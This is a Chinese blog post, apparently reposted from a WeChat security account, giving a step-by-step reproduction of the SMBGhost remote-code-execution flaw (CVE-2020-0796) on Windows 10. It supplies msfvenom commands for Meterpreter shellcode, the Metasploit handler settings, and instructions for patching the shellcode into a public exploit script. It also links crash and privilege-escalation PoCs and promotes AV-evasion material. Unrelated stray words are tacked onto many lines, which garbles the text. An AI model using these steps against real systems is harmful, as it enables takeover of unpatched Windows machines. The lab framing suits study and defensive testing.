簡介python
SMB(全稱是Server Message Block)是一個協議名,它能被用於Web鏈接和客戶端與服務器之間的信息溝通。git
漏洞概述github
(CVE-2020-0796 SMBGhost)該漏洞是因爲SMBv3協議在處理惡意的壓縮數據包時出錯所形成的,它可以讓遠程且未經身份驗證的攻擊者在目標系統上執行任意代碼。該漏洞的後果十分接近永恆之藍系列,都利用Windows SMB漏洞遠程攻擊獲取系統最高權限,WannaCry勒索蠕蟲就是利用永恆之藍系列漏洞攻擊工具製造的大災難。shell
影響版本windows
適用於32位系統的Windows 10版本1903服務器
Windows 10 1903版(用於基於x64的系統)微信
Windows 10 1903版(用於基於ARM64的系統)app
Windows Server 1903版(服務器核心安裝)tcp
適用於32位系統的Windows 10版本1909ide
Windows 10版本1909(用於基於x64的系統)
Windows 10 1909版(用於基於ARM64的系統)
Windows Server版本1909(服務器核心安裝)
這裏是我使用的Windows10版本的靶機
環境搭建
Kali虛擬機以及windows10虛擬機
可在虛擬機中搭建win10系統來進行復現。迅雷連接:
ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/
使用掃描工具來驗證是否由該漏洞
https://github.com/ollypwn/SMBGhost
能夠看到該版本是具備SMBv3 RCE漏洞的
漏洞復現
EXP地址:
https://github.com/chompie1337/SMBGhost_RCE_PoC
該exp使用環境爲python3
下載完成後將該exp放到Kali虛擬機中
啓動msf,使用msf生成shellcode
命令爲:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt
若是不輸入爲txt就使用這一條
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python
執行該命令後會在同目錄下生成一個shellcode.txt,將生成的shellcode替換exp中的exploit.py中的USER_PAYLOAD保存便可。
替換到exploit.py裏面。注意這裏MSF給出的是buf 在exploit.py裏面是USER_PAYLOAD 這個須要修改一下
修改好了exp文件以後,在MSF上面設置監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 192.168.8.138
run
使用exp對windows進行反彈shell。這裏成功了而且沒有藍屏的現象
藍屏的POC。這個POC能夠把由這個漏洞的windows10系統打到藍屏
https://github.com/eerykitty/CVE-2020-0796-PoC
在執行的時候須要注意要安裝一些包和注意路徑的問題
本地提權POC
https://github.com/danigargu/CVE-2020-0796
編譯好了的版本以下:
https://github.com/danigargu/CVE-2020-0796/releases
滲透測試 紅隊攻防 免殺 權限維持 等等技術
及時分享最新漏洞復現以及EXP 國內外最新技術分享!!!
進來一塊兒學習吧
本文分享自微信公衆號 - 黑白天(li0981jing)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。